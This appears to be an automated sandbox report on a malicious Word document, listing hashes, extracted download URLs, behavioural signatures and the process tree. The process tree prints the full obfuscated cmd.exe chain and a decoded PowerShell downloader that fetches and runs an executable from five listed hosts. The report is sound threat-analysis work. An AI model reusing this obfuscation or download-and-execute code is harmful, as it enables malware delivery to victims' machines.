Analysis
-
max time kernel
100s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
17-09-2024 05:45
Static task
static1
Behavioral task
behavioral1
Sample
e62a45cabe2092469274c14bd4f44705_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e62a45cabe2092469274c14bd4f44705_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
e62a45cabe2092469274c14bd4f44705_JaffaCakes118.doc
-
Size
197KB
-
MD5
e62a45cabe2092469274c14bd4f44705
-
SHA1
87801790127af2bc2b871578566786269935f129
-
SHA256
b47082ac91c297b498c0c6a248704783cbbbccd552058fda6d187952b01bd67b
-
SHA512
155be9ce9bf0d7aef058f5974ff7324d8c45057ae8a3ce7901a6dbe98da00b5ab1c9ca9ea929374dcf63305cdc124e497318947b5d9bbcecdf6f55c059704169
-
SSDEEP
3072:bzEWdGujL/xSu90OoiLuDKZXfwKeljR1z:vSUxUOmD+XfwLX
Malware Config
Extracted
http://kantova.com/DWTr10bVVLjs5r
http://www.hjsanders.nl/889KycAhSPlXPbrS
http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW
http://bozziro.ir/YENtfKb77bgd_Gk
http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1624 2628 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 27 548 powershell.exe 28 548 powershell.exe 31 548 powershell.exe 32 548 powershell.exe 34 548 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2628 WINWORD.EXE 2628 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 548 powershell.exe 548 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 548 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2628 WINWORD.EXE 2628 WINWORD.EXE 2628 WINWORD.EXE 2628 WINWORD.EXE 2628 WINWORD.EXE 2628 WINWORD.EXE 2628 WINWORD.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WINWORD.EXEcmd.execmd.execmd.exedescription pid process target process PID 2628 wrote to memory of 1624 2628 WINWORD.EXE cmd.exe PID 2628 wrote to memory of 1624 2628 WINWORD.EXE cmd.exe PID 1624 wrote to memory of 436 1624 cmd.exe cmd.exe PID 1624 wrote to memory of 436 1624 cmd.exe cmd.exe PID 436 wrote to memory of 100 436 cmd.exe cmd.exe PID 436 wrote to memory of 100 436 cmd.exe cmd.exe PID 436 wrote to memory of 3344 436 cmd.exe cmd.exe PID 436 wrote to memory of 3344 436 cmd.exe cmd.exe PID 3344 wrote to memory of 548 3344 cmd.exe powershell.exe PID 3344 wrote to memory of 548 3344 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e62a45cabe2092469274c14bd4f44705_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set Insd=_;ZCPw=Wl{0AhB93pVU.k1%$v7'6MJO2\yTm+(tLe,x-s@IYKfE5NuS~ci j8FrDzQ:o4Hgab/G)dXn}&&for %l in (16;67;5;22;4;18;13;39;46;3;66;55;51;41;21;22;62;22;54;50;54;54;46;30;52;52;11;28;50;66;55;43;68;41;21;22;12;22;34;50;28;4;66;55;43;15;41;21;22;8;8;58;23;12;14;31;25;31;6;26;53;25;60;21;51;26;1;23;56;25;27;31;6;78;40;5;43;67;72;59;40;56;38;58;52;40;38;19;7;40;72;3;8;57;40;78;38;1;23;53;21;51;31;60;6;26;12;38;38;16;66;73;73;20;71;78;38;67;24;71;19;56;67;35;73;63;7;34;62;21;10;72;17;17;39;59;44;51;62;45;12;38;38;16;66;73;73;5;5;5;19;12;59;44;71;78;76;40;62;44;19;78;8;73;60;60;14;48;33;56;11;12;54;4;8;77;4;72;62;54;45;12;38;38;16;66;73;73;71;8;38;67;24;71;12;40;71;8;38;12;56;71;62;40;19;56;67;35;73;5;16;43;56;67;78;38;40;78;38;73;53;16;8;67;71;76;44;73;71;50;10;27;71;71;74;54;17;67;46;0;69;61;7;45;12;38;38;16;66;73;73;72;67;64;64;57;62;67;19;57;62;73;47;50;52;38;49;48;72;25;25;72;70;76;0;74;20;45;12;38;38;16;66;73;73;12;40;57;64;53;78;70;44;78;67;38;76;57;40;78;44;38;43;44;67;49;67;62;38;19;71;38;73;29;38;72;57;34;56;33;53;11;74;3;21;2;13;65;26;19;54;16;8;57;38;37;26;45;26;75;1;23;12;51;25;31;68;6;26;67;21;68;25;10;26;1;23;12;15;21;25;51;58;6;58;26;21;21;31;26;1;23;38;60;21;25;51;6;26;35;68;51;68;21;26;1;23;62;14;60;68;21;6;23;40;78;24;66;38;40;35;16;36;26;32;26;36;23;12;15;21;25;51;36;26;19;40;42;40;26;1;49;67;62;40;71;56;12;37;23;16;31;25;68;68;58;57;78;58;23;53;21;51;31;60;75;9;38;62;33;9;23;56;25;27;31;19;63;67;5;78;8;67;71;76;61;57;8;40;37;23;16;31;25;68;68;41;58;23;62;14;60;68;21;75;1;23;64;25;14;51;27;6;26;35;68;51;27;51;26;1;46;49;58;37;37;74;40;38;43;46;38;40;35;58;23;62;14;60;68;21;75;19;8;40;78;70;38;12;58;43;70;40;58;68;10;10;10;10;75;58;9;46;78;24;67;20;40;43;46;38;40;35;58;23;62;14;60;68;21;1;23;57;14;51;60;10;6;26;56;25;51;10;21;26;1;72;62;40;71;20;1;79;79;56;71;38;56;12;9;79;79;23;8;25;14;60;27;6;26;57;14;21;25;26;1;88)do set EU7r=!EU7r!!Insd:~%l,1!&&if %l gtr 87 echo !EU7r:~-606!|%LOCALAPPDATA:~-3,-2%m%TMP:~-15,-14% "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\system32\cmd.exeCmD /V:O/C"set Insd=_;ZCPw=Wl{0AhB93pVU.k1%$v7'6MJO2\yTm+(tLe,x-s@IYKfE5NuS~ci j8FrDzQ:o4Hgab/G)dXn}&&for %l in (16;67;5;22;4;18;13;39;46;3;66;55;51;41;21;22;62;22;54;50;54;54;46;30;52;52;11;28;50;66;55;43;68;41;21;22;12;22;34;50;28;4;66;55;43;15;41;21;22;8;8;58;23;12;14;31;25;31;6;26;53;25;60;21;51;26;1;23;56;25;27;31;6;78;40;5;43;67;72;59;40;56;38;58;52;40;38;19;7;40;72;3;8;57;40;78;38;1;23;53;21;51;31;60;6;26;12;38;38;16;66;73;73;20;71;78;38;67;24;71;19;56;67;35;73;63;7;34;62;21;10;72;17;17;39;59;44;51;62;45;12;38;38;16;66;73;73;5;5;5;19;12;59;44;71;78;76;40;62;44;19;78;8;73;60;60;14;48;33;56;11;12;54;4;8;77;4;72;62;54;45;12;38;38;16;66;73;73;71;8;38;67;24;71;12;40;71;8;38;12;56;71;62;40;19;56;67;35;73;5;16;43;56;67;78;38;40;78;38;73;53;16;8;67;71;76;44;73;71;50;10;27;71;71;74;54;17;67;46;0;69;61;7;45;12;38;38;16;66;73;73;72;67;64;64;57;62;67;19;57;62;73;47;50;52;38;49;48;72;25;25;72;70;76;0;74;20;45;12;38;38;16;66;73;73;12;40;57;64;53;78;70;44;78;67;38;76;57;40;78;44;38;43;44;67;49;67;62;38;19;71;38;73;29;38;72;57;34;56;33;53;11;74;3;21;2;13;65;26;19;54;16;8;57;38;37;26;45;26;75;1;23;12;51;25;31;68;6;26;67;21;68;25;10;26;1;23;12;15;21;25;51;58;6;58;26;21;21;31;26;1;23;38;60;21;25;51;6;26;35;68;51;68;21;26;1;23;62;14;60;68;21;6;23;40;78;24;66;38;40;35;16;36;26;32;26;36;23;12;15;21;25;51;36;26;19;40;42;40;26;1;49;67;62;40;71;56;12;37;23;16;31;25;68;68;58;57;78;58;23;53;21;51;31;60;75;9;38;62;33;9;23;56;25;27;31;19;63;67;5;78;8;67;71;76;61;57;8;40;37;23;16;31;25;68;68;41;58;23;62;14;60;68;21;75;1;23;64;25;14;51;27;6;26;35;68;51;27;51;26;1;46;49;58;37;37;74;40;38;43;46;38;40;35;58;23;62;14;60;68;21;75;19;8;40;78;70;38;12;58;43;70;40;58;68;10;10;10;10;75;58;9;46;78;24;67;20;40;43;46;38;40;35;58;23;62;14;60;68;21;1;23;57;14;51;60;10;6;26;56;25;51;10;21;26;1;72;62;40;71;20;1;79;79;56;71;38;56;12;9;79;79;23;8;25;14;60;27;6;26;57;14;21;25;26;1;88)do set EU7r=!EU7r!!Insd:~%l,1!&&if %l gtr 87 echo !EU7r:~-606!|cmD "3⤵
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $h9272='u7815';$c762=new-object Net.WebClient;$u1528='http://kantova.com/DWTr10bVVLjs5r@http://www.hjsanders.nl/889KycAhSPlXPbrS@http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW@http://bozziro.ir/YENtfKb77bgd_Gk@http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ'.Split('@');$h5724='o1470';$h3175 = '112';$t8175='m4541';$r9841=$env:temp+'\'+$h3175+'.exe';foreach($p2744 in $u1528){try{$c762.DownloadFile($p2744, $r9841);$z7956='m4565';If ((Get-Item $r9841).length -ge 40000) {Invoke-Item $r9841;$i9580='c7501';break;}}catch{}}$l7986='i917';"4⤵PID:100
-
C:\Windows\system32\cmd.execmD4⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $h9272='u7815';$c762=new-object Net.WebClient;$u1528='http://kantova.com/DWTr10bVVLjs5r@http://www.hjsanders.nl/889KycAhSPlXPbrS@http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW@http://bozziro.ir/YENtfKb77bgd_Gk@http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ'.Split('@');$h5724='o1470';$h3175 = '112';$t8175='m4541';$r9841=$env:temp+'\'+$h3175+'.exe';foreach($p2744 in $u1528){try{$c762.DownloadFile($p2744, $r9841);$z7956='m4565';If ((Get-Item $r9841).length -ge 40000) {Invoke-Item $r9841;$i9580='c7501';break;}}catch{}}$l7986='i917';5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:548
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84